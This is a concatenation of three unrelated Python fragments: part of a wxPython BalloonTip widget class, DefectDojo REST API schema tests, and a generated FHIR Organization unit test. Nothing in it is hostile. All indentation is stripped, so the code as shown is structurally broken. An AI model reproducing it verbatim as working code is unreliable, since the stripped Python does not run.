:param `title`: a string to use as a L{BalloonTip} title.
"""
self._toptitle = title
def GetBalloonTitle(self):
""" Returns the L{BalloonTip} top title."""
return self._toptitle
def SetBalloonMessage(self, message):
"""
Sets the L{BalloonTip} tip message.
:param `message`: a string identifying the main message body of L{BalloonTip}.
:note: The L{BalloonTip} message should never be empty.
"""
if len(message.strip()) < 1:
raise Exception("\nERROR: BalloonTip Message Can Not Be Empty")
self._message = message
def GetBalloonMessage(self):
""" Returns the L{BalloonTip} tip message."""
return self._message
def SetBalloonTipStyle(self, tipstyle=BT_LEAVE):
"""
Sets the L{BalloonTip} `tipstyle` parameter.
:param `tipstyle`: one of the following bit set:
============== ========== =====================================
Tip Style Hex Value Description
============== ========== =====================================
``BT_LEAVE`` 0x3 `BalloonTip` will be destroyed when the user moves the mouse outside the target window.
``BT_CLICK`` 0x4 `BalloonTip` will be destroyed when the user click on `BalloonTip`.
``BT_BUTTON`` 0x5 `BalloonTip` will be destroyed when the user click on the close button.
============== ========== =====================================
"""
if tipstyle not in [BT_LEAVE, BT_CLICK, BT_BUTTON]:
raise Exception('\nERROR: BalloonTip TipStyle Should Be One Of "BT_LEAVE", '\
'"BT_CLICK", "BT_BUTTON"')
self._tipstyle = tipstyle
def GetBalloonTipStyle(self):
"""
Returns the L{BalloonTip} `tipstyle` parameter.
:see: L{SetBalloonTipStyle}
"""
return self._tipstyle
def SetBalloonColour(self, colour=None):
"""
Sets the L{BalloonTip} background colour.
:param `colour`: a valid `wx.Colour` instance.
"""
if colour is None:
colour = wx.Colour(255, 250, 205)
self._ballooncolour = colour
def GetBalloonColour(self):
""" Returns the L{BalloonTip} background colour."""
return self._ballooncolour
def SetTitleFont(self, font=None):
"""
Sets the font for the top title.
:param `font`: a valid `wx.Font` instance.
"""
if font is None:
font = wx.Font(9, wx.SWISS, wx.NORMAL, wx.BOLD, False)
self._balloontitlefont = font
def GetTitleFont(self):
""" Returns the font for the top title."""
return self._balloontitlefont
def SetMessageFont(self, font=None):
"""
Sets the font for the tip message.
:param `font`: a valid `wx.Font` instance.
"""
if font is None:
font = wx.Font(8, wx.SWISS, wx.NORMAL, wx.NORMAL, False)
self._balloonmsgfont = font
def GetMessageFont(self):
""" Returns the font for the tip message."""
return self._balloonmsgfont
def SetTitleColour(self, colour=None):
"""
Sets the colour for the top title.
:param `colour`: a valid `wx.Colour` instance.
"""
if colour is None:
colour = wx.BLACK
self._balloontitlecolour = colour
def GetTitleColour(self):
""" Returns the colour for the top title."""
return self._balloontitlecolour
def SetMessageColour(self, colour=None):
"""
Sets the colour for the tip message.
:param `colour`: a valid `wx.Colour` instance.
"""
if colour is None:
colour = wx.BLACK
self._balloonmsgcolour = colour
def GetMessageColour(self):
""" Returns the colour for the tip message."""
return self._balloonmsgcolour
def OnDestroy(self, event):
"""
Handles the target destruction, specifically handling the ``wx.EVT_WINDOW_DESTROY``
event.
:param `event`: a `wx.WindowDestroyEvent` event to be processed.
"""
if hasattr(self, "BalloonFrame"):
if self.BalloonFrame:
try:
if isinstance(self._widget, wx.TaskBarIcon):
self._widget.Unbind(wx.EVT_TASKBAR_MOVE)
self.taskbartime.Stop()
del self.taskbartime
else:
self._widget.Unbind(wx.EVT_MOTION)
self._widget.Unbind(wx.EVT_LEAVE_WINDOW)
self._widget.Unbind(wx.EVT_ENTER_WINDOW)
self.BalloonFrame.Destroy()
except:
pass
del self.BalloonFrame
def EnableTip(self, enable=True):
"""
Enable/disable globally the L{BalloonTip}.
:param `enable`: ``True`` to enable L{BalloonTip}, ``False`` otherwise.
"""
self._runningapp.__tooltipenabled__ = enable
| |
from django.test import tag
from rest_framework.test import APIRequestFactory
from rest_framework.views import APIView
from rest_framework.test import APITestCase, force_authenticate, APIClient
from rest_framework.mixins import \
RetrieveModelMixin, ListModelMixin, CreateModelMixin, UpdateModelMixin
from rest_framework import status
from drf_yasg.generators import OpenAPISchemaGenerator
from drf_yasg.openapi import Info, SchemaRef
from drf_yasg.openapi import \
TYPE_ARRAY, TYPE_BOOLEAN, TYPE_INTEGER, TYPE_NUMBER, TYPE_OBJECT, TYPE_STRING
from collections import OrderedDict
from dojo.api_v2.views import \
DevelopmentEnvironmentViewSet, EndpointStatusViewSet, EndPointViewSet, \
EngagementViewSet, FindingTemplatesViewSet, FindingViewSet, \
JiraInstanceViewSet, DojoMetaViewSet, NoteTypeViewSet, NotesViewSet, \
ProductTypeViewSet, ProductViewSet, RegulationsViewSet, \
SonarqubeIssueViewSet, SonarqubeProductViewSet, \
SonarqubeIssueTransitionViewSet, StubFindingsViewSet, SystemSettingsViewSet, \
TestTypesViewSet, TestsViewSet, ToolConfigurationsViewSet, ToolProductSettingsViewSet, \
ToolTypesViewSet, UsersViewSet, JiraIssuesViewSet, JiraProjectViewSet, AppAnalysisViewSet, \
LanguageTypeViewSet, LanguageViewSet
from dojo.models import \
Development_Environment, Endpoint_Status, Endpoint, Engagement, Finding_Template, \
Finding, JIRA_Instance, JIRA_Issue, DojoMeta, Note_Type, Notes, Product_Type, Product, Regulation, \
Sonarqube_Issue, Sonarqube_Product, Sonarqube_Issue_Transition, \
Stub_Finding, System_Settings, Test_Type, Test, Tool_Configuration, Tool_Product_Settings, \
Tool_Type, Dojo_User, JIRA_Project, App_Analysis, Language_Type, Languages
from dojo.api_v2.serializers import \
DevelopmentEnvironmentSerializer, EndpointStatusSerializer, EndpointSerializer, \
EngagementSerializer, FindingTemplateSerializer, FindingSerializer, \
JIRAInstanceSerializer, JIRAIssueSerializer, JIRAProjectSerializer, MetaSerializer, NoteTypeSerializer, \
ProductSerializer, RegulationSerializer, \
SonarqubeIssueSerializer, SonarqubeProductSerializer, SonarqubeIssueTransitionSerializer, \
StubFindingSerializer, SystemSettingsSerializer, TestTypeSerializer, TestSerializer, ToolConfigurationSerializer, \
ToolProductSettingsSerializer, ToolTypeSerializer, UserSerializer, NoteSerializer, ProductTypeSerializer, \
AppAnalysisSerializer, LanguageTypeSerializer, LanguageSerializer
SWAGGER_SCHEMA_GENERATOR = OpenAPISchemaGenerator(Info("defectdojo", "v2"))
BASE_API_URL = "/api/v2"
def testIsBroken(method):
return tag("broken")(method)
def skipIfNotSubclass(baseclass):
def decorate(f):
def wrapper(self, *args, **kwargs):
if not issubclass(self.viewset, baseclass):
self.skipTest('This view is not %s' % baseclass)
else:
f(self, *args, **kwargs)
return wrapper
return decorate
def check_response_valid(expected_code, response):
def _data_to_str(response):
if hasattr(response, "data"):
return response.data
return None
assert response.status_code == expected_code, \
f"Response invalid, returned with code {response.status_code}\nResponse Data:\n{_data_to_str(response)}"
def format_url(path):
return f"{BASE_API_URL}{path}"
class SchemaChecker():
def __init__(self, definitions):
self._prefix = []
self._has_failed = False
self._definitions = definitions
self._errors = []
def _register_error(self, error):
self._errors += [error]
def _check_or_fail(self, condition, message):
if not condition:
self._has_failed = True
self._register_error(message)
def _get_prefix(self):
return '#'.join(self._prefix)
def _push_prefix(self, prefix):
self._prefix += [prefix]
def _pop_prefix(self):
self._prefix = self._prefix if len(self._prefix) == 0 else self._prefix[:-1]
def _resolve_if_ref(self, schema):
if type(schema) is not SchemaRef:
return schema
ref_name = schema["$ref"]
ref_name = ref_name[ref_name.rfind("/") + 1:]
return self._definitions[ref_name]
def _check_has_required_fields(self, required_fields, obj):
for required_field in required_fields:
# passwords are writeOnly, but this is not supported by Swagger / OpenAPIv2
if required_field != 'password':
field = f"{self._get_prefix()}#{required_field}"
self._check_or_fail(obj is not None and required_field in obj, f"{field} is required but was not returned")
def _check_type(self, schema, obj):
schema_type = schema["type"]
is_nullable = schema.get("x-nullable", False) or schema.get("readOnly", False)
def _check_helper(check):
self._check_or_fail(check, f"{self._get_prefix()} should be of type {schema_type} but value was of type {type(obj)}")
if obj is None:
self._check_or_fail(is_nullable, f"{self._get_prefix()} is not nullable yet the value returned was null")
elif schema_type is TYPE_BOOLEAN:
_check_helper(isinstance(obj, bool))
elif schema_type is TYPE_INTEGER:
_check_helper(isinstance(obj, int))
elif schema_type is TYPE_NUMBER:
_check_helper(obj.isdecimal())
elif schema_type is TYPE_ARRAY:
_check_helper(isinstance(obj, list))
elif schema_type is TYPE_OBJECT:
_check_helper(isinstance(obj, OrderedDict) or isinstance(obj, dict))
elif schema_type is TYPE_STRING:
_check_helper(isinstance(obj, str))
else:
# Default case
_check_helper(False)
def _with_prefix(self, prefix, callable, *args):
self._push_prefix(prefix)
callable(*args)
self._pop_prefix()
def check(self, schema, obj):
def _check(schema, obj):
schema = self._resolve_if_ref(schema)
self._check_type(schema, obj)
required_fields = schema.get("required", [])
self._check_has_required_fields(required_fields, obj)
if obj is None:
return
properties = schema.get("properties", None)
if properties is not None:
for name, prop in properties.items():
# print('property: ', name)
# print('obj ', obj)
obj_child = obj.get(name, None)
if obj_child is not None:
self._with_prefix(name, _check, prop, obj_child)
for child_name in obj.keys():
# TODO prefetch mixins not picked up by spectcular?
if child_name not in ['prefetch']:
if not properties or child_name not in properties.keys():
self._has_failed = True
self._register_error(f'unexpected property "{child_name}" found')
additional_properties = schema.get("additionalProperties", None)
if additional_properties is not None:
for name, obj_child in obj.items():
self._with_prefix(f"additionalProp<{name}>", _check, additional_properties, obj_child)
if schema["type"] is TYPE_ARRAY:
items_schema = schema["items"]
for index in range(len(obj)):
self._with_prefix(f"item{index}", _check, items_schema, obj[index])
self._has_failed = False
self._errors = []
self._prefix = []
_check(schema, obj)
assert not self._has_failed, "\n" + '\n'.join(self._errors) + "\nFailed with " + str(len(self._errors)) + " errors"
class BaseClass():
class SchemaTest(APITestCase):
fixtures = ['dojo_testdata.json']
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewset = None
self.viewname = None
self.model = None
self.serializer = None
self.field_transformers = dict()
def setUp(self):
super().setUp()
testuser = Dojo_User.objects.get(username='admin')
factory = APIRequestFactory()
request = factory.get('/')
force_authenticate(request, user=testuser)
request = APIView().initialize_request(request)
self.schema = SWAGGER_SCHEMA_GENERATOR.get_schema(request, public=True)
self.client = APIClient()
self.client.force_authenticate(user=testuser)
def check_schema(self, schema, obj):
schema_checker = SchemaChecker(self.schema["definitions"])
# print(vars(schema_checker))
schema_checker.check(schema, obj)
def get_valid_object_id(self):
response = self.client.get(format_url(f"/{self.viewname}/"))
check_response_valid(status.HTTP_200_OK, response)
if len(response.data["results"]) == 0:
return None
return response.data["results"][0].get('id', None)
def get_endpoint_schema(self, path, method):
paths = self.schema["paths"]
methods = paths.get(path, None)
assert methods is not None, f"{path} not found in {[path for path in paths.keys()]}"
endpoint = methods.get(method, None)
assert endpoint is not None, f"Method {method} not found in {[method for method in methods.keys()]}"
return endpoint
def construct_response_data(self, obj_id):
obj = self.model.objects.get(id=obj_id)
request = APIView().initialize_request(APIRequestFactory().request())
serialized_obj = self.serializer(context={"request": request}).to_representation(obj)
for name, transformer in self.field_transformers.items():
serialized_obj[name] = transformer(serialized_obj[name])
return serialized_obj
@skipIfNotSubclass(ListModelMixin)
def test_list_endpoint(self, extra_args=None):
endpoints = self.schema["paths"][f"/{self.viewname}/"]
response = self.client.get(format_url(f"/{self.viewname}/"), extra_args)
check_response_valid(status.HTTP_200_OK, response)
schema = endpoints['get']['responses']['200']['schema']
obj = response.data
self.check_schema(schema, obj)
@skipIfNotSubclass(RetrieveModelMixin)
def test_retrieve_endpoint(self, extra_args=None):
endpoints = self.schema["paths"][f"/{self.viewname}/{{id}}/"]
response = self.client.get(format_url(f"/{self.viewname}/"))
check_response_valid(status.HTTP_200_OK, response)
ids = [obj['id'] for obj in response.data["results"]]
schema = endpoints['get']['responses']['200']['schema']
for id in ids:
print('id:', id)
response = self.client.get(format_url(f"/{self.viewname}/{id}/"), extra_args)
print('response type:', type(response))
print('response data:', response.data)
check_response_valid(status.HTTP_200_OK, response)
obj = response.data
self.check_schema(schema, obj)
@skipIfNotSubclass(UpdateModelMixin)
def test_patch_endpoint(self, extra_args=None):
operation = self.schema["paths"][f"/{self.viewname}/{{id}}/"]["patch"]
id = self.get_valid_object_id()
if id is None:
self.skipTest("No data exists to test endpoint")
data = self.construct_response_data(id)
schema = operation['responses']['200']['schema']
response = self.client.patch(format_url(f"/{self.viewname}/{id}/"), data, format='json')
check_response_valid(status.HTTP_200_OK, response)
obj = response.data
self.check_schema(schema, obj)
@skipIfNotSubclass(UpdateModelMixin)
def test_put_endpoint(self, extra_data={}, extra_args=None):
operation = self.schema["paths"][f"/{self.viewname}/{{id}}/"]['put']
id = self.get_valid_object_id()
if id is None:
self.skipTest("No data exists to test endpoint")
data = self.construct_response_data(id)
data.update(extra_data)
schema = operation['responses']['200']['schema']
response = self.client.put(format_url(f"/{self.viewname}/{id}/"), data, format='json')
check_response_valid(status.HTTP_200_OK, response)
obj = response.data
self.check_schema(schema, obj)
@skipIfNotSubclass(CreateModelMixin)
def test_post_endpoint(self, extra_data=[], extra_args=None):
operation = self.schema["paths"][f"/{self.viewname}/"]["post"]
id = self.get_valid_object_id()
if id is None:
self.skipTest("No data exists to test endpoint")
data = self.construct_response_data(id)
data.update(extra_data)
print('data:', data)
schema = operation['responses']['201']['schema']
response = self.client.post(format_url(f"/{self.viewname}/"), data, format='json')
check_response_valid(status.HTTP_201_CREATED, response)
print('response.data:', response.data)
obj = response.data
self.check_schema(schema, obj)
class DevelopmentEnvironmentTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "development_environments"
self.viewset = DevelopmentEnvironmentViewSet
self.model = Development_Environment
self.serializer = DevelopmentEnvironmentSerializer
# Test will only work when FEATURE_AUTHENTICATION_V2 is the default
# class DojoGroupTest(BaseClass.SchemaTest):
# def __init__(self, *args, **kwargs):
# super().__init__(*args, **kwargs)
# self.viewname = "group"
# self.viewset = DojoGroupViewSet
# self.model = Dojo_Group
# self.serializer = DojoGroupSerializer
class EndpointStatusTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "endpoint_status"
self.viewset = EndpointStatusViewSet
self.model = Endpoint_Status
self.serializer = EndpointStatusSerializer
class EndpointTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "endpoints"
self.viewset = EndPointViewSet
self.model = Endpoint
self.serializer = EndpointSerializer
self.field_transformers = {
"path": lambda v: (v if v else '') + "transformed/"
}
class EngagementTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "engagements"
self.viewset = EngagementViewSet
self.model = Engagement
self.serializer = EngagementSerializer
# @testIsBroken
# fixed
def test_accept_risks(self):
operation = self.get_endpoint_schema("/engagements/{id}/accept_risks/", "post")
schema = operation['responses']['201']['schema']
print(schema)
id = self.get_valid_object_id()
if id is None:
self.skipTest("No data exists to test endpoint")
data = [
{
"cve": 1,
"justification": "test",
"accepted_by": "2"
}
]
response = self.client.post(format_url(f"/engagements/{id}/accept_risks/"), data, format='json')
check_response_valid(201, response)
print('response.data')
# print(vars(response))
print(response.content)
obj = response.data
self.check_schema(schema, obj)
# fixed
def test_notes_read(self):
operation = self.get_endpoint_schema("/engagements/{id}/notes/", "get")
schema = operation['responses']['200']['schema']
id = self.get_valid_object_id()
if id is None:
self.skipTest("No data exists to test endpoint")
response = self.client.get(format_url(f"/engagements/{id}/notes/"))
check_response_valid(200, response)
obj = response.data
self.check_schema(schema, obj)
# fixed
def test_notes_create(self):
operation = self.get_endpoint_schema("/engagements/{id}/notes/", "post")
schema = operation['responses']['201']['schema']
id = self.get_valid_object_id()
if id is None:
self.skipTest("No data exists to test endpoint")
data = {
"entry": "test",
"author": 2,
}
response = self.client.post(format_url(f"/engagements/{id}/notes/"), data, format='json')
check_response_valid(201, response)
obj = response.data
self.check_schema(schema, obj)
class FindingTemplateTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "finding_templates"
self.viewset = FindingTemplatesViewSet
self.model = Finding_Template
self.serializer = FindingTemplateSerializer
# fixed
def test_post_endpoint(self):
super().test_post_endpoint()
# fixed
def test_patch_endpoint(self):
super().test_patch_endpoint()
# fixed
def test_put_endpoint(self):
super().test_put_endpoint()
class FindingTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "findings"
self.viewset = FindingViewSet
self.model = Finding
self.serializer = FindingSerializer
# fixed
def test_list_endpoint(self):
super().test_list_endpoint({
"related_fields": True
})
# fixed
def test_patch_endpoint(self):
super().test_patch_endpoint()
# fixed
def test_put_endpoint(self):
super().test_put_endpoint()
# fixed
def test_retrieve_endpoint(self):
super().test_retrieve_endpoint({
"related_fields": True
})
class JiraInstanceTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "jira_instances"
self.viewset = JiraInstanceViewSet
self.model = JIRA_Instance
self.serializer = JIRAInstanceSerializer
# fixed
def test_list_endpoint(self):
super().test_list_endpoint()
# fixed
def test_patch_endpoint(self):
super().test_patch_endpoint()
# fixed
def test_put_endpoint(self):
super().test_put_endpoint(extra_data={"password": "12345"})
# fixed
def test_retrieve_endpoint(self):
super().test_retrieve_endpoint()
# fixed
def test_post_endpoint(self):
super().test_post_endpoint(extra_data={"password": "12345"})
class JiraFindingMappingsTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "jira_finding_mappings"
self.viewset = JiraIssuesViewSet
self.model = JIRA_Issue
self.serializer = JIRAIssueSerializer
self.field_transformers = {
"finding": lambda v: 2,
"engagement": lambda v: 2
}
class JiraProjectTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "jira_projects"
self.viewset = JiraProjectViewSet
self.model = JIRA_Project
self.serializer = JIRAProjectSerializer
class MetadataTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "metadata"
self.viewset = DojoMetaViewSet
self.model = DojoMeta
self.serializer = MetaSerializer
class NoteTypeTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "note_type"
self.viewset = NoteTypeViewSet
self.model = Note_Type
self.serializer = NoteTypeSerializer
self.field_transformers = {
"name": lambda v: v + "_new"
}
class NoteTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "notes"
self.viewset = NotesViewSet
self.model = Notes
self.serializer = NoteSerializer
class ProductTypeTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "product_types"
self.viewset = ProductTypeViewSet
self.model = Product_Type
self.serializer = ProductTypeSerializer
self.field_transformers = {
"name": lambda v: v + "_new"
}
# Test will only work when FEATURE_AUTHENTICATION_V2 is the default
# class ProductTypeMemberTest(BaseClass.SchemaTest):
# def __init__(self, *args, **kwargs):
# super().__init__(*args, **kwargs)
# self.viewname = "product_type_members"
# self.viewset = ProductTypeMemberViewSet
# self.model = Product_Type_Member
# self.serializer = ProductTypeMemberSerializer
# Test will only work when FEATURE_AUTHENTICATION_V2 is the default
# class ProductTypeGroupTest(BaseClass.SchemaTest):
# def __init__(self, *args, **kwargs):
# super().__init__(*args, **kwargs)
# self.viewname = "product_type_groups"
# self.viewset = ProductTypeGroupViewSet
# self.model = Product_Type_Group
# self.serializer = ProductTypeGroupSerializer
class ProductTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "products"
self.viewset = ProductViewSet
self.model = Product
self.serializer = ProductSerializer
self.field_transformers = {
"name": lambda v: v + "_new"
}
# fixed
def test_list_endpoint(self):
super().test_list_endpoint()
# fixed
def test_patch_endpoint(self):
super().test_patch_endpoint()
# fixed
def test_put_endpoint(self):
super().test_put_endpoint()
# fixed
def test_retrieve_endpoint(self):
super().test_retrieve_endpoint()
# fixed
def test_post_endpoint(self):
super().test_post_endpoint()
# Test will only work when FEATURE_AUTHENTICATION_V2 is the default
# class ProductMemberTest(BaseClass.SchemaTest):
# def __init__(self, *args, **kwargs):
# super().__init__(*args, **kwargs)
# self.viewname = "product_members"
# self.viewset = ProductMemberViewSet
# self.model = Product_Member
# self.serializer = ProductMemberSerializer
# @testIsBroken
# def test_post_endpoint(self):
# super().test_post_endpoint()
# @testIsBroken
# def test_patch_endpoint(self):
# super().test_post_endpoint()
# Test will only work when FEATURE_AUTHENTICATION_V2 is the default
# class ProductGroupTest(BaseClass.SchemaTest):
# def __init__(self, *args, **kwargs):
# super().__init__(*args, **kwargs)
# self.viewname = "product_groups"
# self.viewset = ProductGroupViewSet
# self.model = Product_Group
# self.serializer = ProductGroupSerializer
class RegulationTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "regulations"
self.viewset = RegulationsViewSet
self.model = Regulation
self.serializer = RegulationSerializer
class SonarqubeIssuesTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "sonarqube_issues"
self.viewset = SonarqubeIssueViewSet
self.model = Sonarqube_Issue
self.serializer = SonarqubeIssueSerializer
self.field_transformers = {
"key": lambda v: v + "_new"
}
class SonarqubeProductConfTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "sonarqube_product_configurations"
self.viewset = SonarqubeProductViewSet
self.model = Sonarqube_Product
self.serializer = SonarqubeProductSerializer
class SonarqubeTransitionTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "sonarqube_transitions"
self.viewset = SonarqubeIssueTransitionViewSet
self.model = Sonarqube_Issue_Transition
self.serializer = SonarqubeIssueTransitionSerializer
class StubFindingTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "stub_findings"
self.viewset = StubFindingsViewSet
self.model = Stub_Finding
self.serializer = StubFindingSerializer
class SystemSettingTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "system_settings"
self.viewset = SystemSettingsViewSet
self.model = System_Settings
self.serializer = SystemSettingsSerializer
class AppAnalysisTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "technologies"
self.viewset = AppAnalysisViewSet
self.model = App_Analysis
self.serializer = AppAnalysisSerializer
# fixed
def test_patch_endpoint(self):
super().test_patch_endpoint()
# fixed
def test_put_endpoint(self):
super().test_put_endpoint()
# fixed
def test_post_endpoint(self):
super().test_post_endpoint()
class TestTypeTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "test_types"
self.viewset = TestTypesViewSet
self.model = Test_Type
self.serializer = TestTypeSerializer
self.field_transformers = {
"name": lambda v: v + "_new"
}
class TestsTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "tests"
self.viewset = TestsViewSet
self.model = Test
self.serializer = TestSerializer
class ToolConfigurationTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "tool_configurations"
self.viewset = ToolConfigurationsViewSet
self.model = Tool_Configuration
self.serializer = ToolConfigurationSerializer
class ToolProductSettingTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "tool_product_settings"
self.viewset = ToolProductSettingsViewSet
self.model = Tool_Product_Settings
self.serializer = ToolProductSettingsSerializer
class ToolTypeTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "tool_types"
self.viewset = ToolTypesViewSet
self.model = Tool_Type
self.serializer = ToolTypeSerializer
class UserTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "users"
self.viewset = UsersViewSet
self.model = Dojo_User
self.serializer = UserSerializer
self.field_transformers = {
"username": lambda v: v + "_transformed"
}
class LanguageTypeTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "language_types"
self.viewset = LanguageTypeViewSet
self.model = Language_Type
self.serializer = LanguageTypeSerializer
class LanguageTest(BaseClass.SchemaTest):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.viewname = "languages"
self.viewset = LanguageViewSet
self.model = Languages
self.serializer = LanguageSerializer
def test_post_endpoint(self):
super().test_post_endpoint(extra_data={"language": 2})
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 1.0.2.7202 on 2016-06-23.
# 2016, SMART Health IT.
import io
import json
import os
import unittest
from . import organization
class OrganizationTests(unittest.TestCase):
def instantiate_from(self, filename):
datadir = os.environ.get('FHIR_UNITTEST_DATADIR') or ''
with io.open(os.path.join(datadir, filename), 'r', encoding='utf-8') as handle:
js = json.load(handle)
self.assertEqual("Organization", js["resourceType"])
return organization.Organization(js)
def testOrganization1(self):
inst = self.instantiate_from("organization-example-f001-burgers.json")
self.assertIsNotNone(inst, "Must have instantiated a Organization instance")
self.implOrganization1(inst)
js = inst.as_json()
self.assertEqual("Organization", js["resourceType"])
inst2 = organization.Organization(js)
self.implOrganization1(inst2)
def implOrganization1(self, inst):
self.assertEqual(inst.address[0].city, "Den Burg")
self.assertEqual(inst.address[0].country, "NLD")
self.assertEqual(inst.address[0].line[0], "Galapagosweg 91")
self.assertEqual(inst.address[0].postalCode, "9105 PZ")
self.assertEqual(inst.address[0].use, "work")
self.assertEqual(inst.address[1].city, "Den Burg")
self.assertEqual(inst.address[1].country, "NLD")
self.assertEqual(inst.address[1].line[0], "PO Box 2311")
self.assertEqual(inst.address[1].postalCode, "9100 AA")
self.assertEqual(inst.address[1].use, "work")
self.assertEqual(inst.contact[0].purpose.coding[0].code, "PRESS")
self.assertEqual(inst.contact[0].purpose.coding[0].system, "http://hl7.org/fhir/contactentity-type")
self.assertEqual(inst.contact[0].telecom[0].system, "phone")
self.assertEqual(inst.contact[0].telecom[0].value, "022-655 2334")
self.assertEqual(inst.contact[1].purpose.coding[0].code, "PATINF")
self.assertEqual(inst.contact[1].purpose.coding[0].system, "http://hl7.org/fhir/contactentity-type")
self.assertEqual(inst.contact[1].telecom[0].system, "phone")
self.assertEqual(inst.contact[1].telecom[0].value, "022-655 2335")
self.assertEqual(inst.id, "f001")
self.assertEqual(inst.identifier[0].system, "urn:oid:2.16.528.1")
self.assertEqual(inst.identifier[0].use, "official")
self.assertEqual(inst.identifier[0].value, "91654")
self.assertEqual(inst.identifier[1].system, "urn:oid:2.16.840.1.113883.2.4.6.1")
self.assertEqual(inst.identifier[1].use, "usual")
self.assertEqual(inst.identifier[1].value, "17-0112278")
self.assertEqual(inst.name, "Burgers University Medical Center")
self.assertEqual(inst.telecom[0].system, "phone")
self.assertEqual(inst.telecom[0].use, "work")
self.assertEqual(inst.telecom[0].value, "022-655 2300")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "V6")
self.assertEqual(inst.type.coding[0].display, "University Medical Hospital")
self.assertEqual(inst.type.coding[0].system, "urn:oid:2.16.840.1.113883.2.4.15.1060")
self.assertEqual(inst.type.coding[1].code, "prov")
self.assertEqual(inst.type.coding[1].display, "Healthcare Provider")
self.assertEqual(inst.type.coding[1].system, "http://hl7.org/fhir/organization-type")
def testOrganization2(self):
inst = self.instantiate_from("organization-example-f002-burgers-card.json")
self.assertIsNotNone(inst, "Must have instantiated a Organization instance")
self.implOrganization2(inst)
js = inst.as_json()
self.assertEqual("Organization", js["resourceType"])
inst2 = organization.Organization(js)
self.implOrganization2(inst2)
def implOrganization2(self, inst):
self.assertTrue(inst.active)
self.assertEqual(inst.address[0].line[0], "South Wing, floor 2")
self.assertEqual(inst.contact[0].address.line[0], "South Wing, floor 2")
self.assertEqual(inst.contact[0].name.text, "mevr. D. de Haan")
self.assertEqual(inst.contact[0].purpose.coding[0].code, "ADMIN")
self.assertEqual(inst.contact[0].purpose.coding[0].system, "http://hl7.org/fhir/contactentity-type")
self.assertEqual(inst.contact[0].telecom[0].system, "phone")
self.assertEqual(inst.contact[0].telecom[0].value, "022-655 2321")
self.assertEqual(inst.contact[0].telecom[1].system, "email")
self.assertEqual(inst.contact[0].telecom[1].value, "cardio@burgersumc.nl")
self.assertEqual(inst.contact[0].telecom[2].system, "fax")
self.assertEqual(inst.contact[0].telecom[2].value, "022-655 2322")
self.assertEqual(inst.id, "f002")
self.assertEqual(inst.name, "Burgers UMC Cardiology unit")
self.assertEqual(inst.telecom[0].system, "phone")
self.assertEqual(inst.telecom[0].value, "022-655 2320")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "dept")
self.assertEqual(inst.type.coding[0].display, "Hospital Department")
self.assertEqual(inst.type.coding[0].system, "http://hl7.org/fhir/organization-type")
def testOrganization3(self):
inst = self.instantiate_from("organization-example-f003-burgers-ENT.json")
self.assertIsNotNone(inst, "Must have instantiated a Organization instance")
self.implOrganization3(inst)
js = inst.as_json()
self.assertEqual("Organization", js["resourceType"])
inst2 = organization.Organization(js)
self.implOrganization3(inst2)
def implOrganization3(self, inst):
self.assertTrue(inst.active)
self.assertEqual(inst.address[0].line[0], "West Wing, floor 5")
self.assertEqual(inst.contact[0].address.line[0], "West Wing, floor 5")
self.assertEqual(inst.contact[0].name.text, "mr. F. de Hond")
self.assertEqual(inst.contact[0].purpose.coding[0].code, "ADMIN")
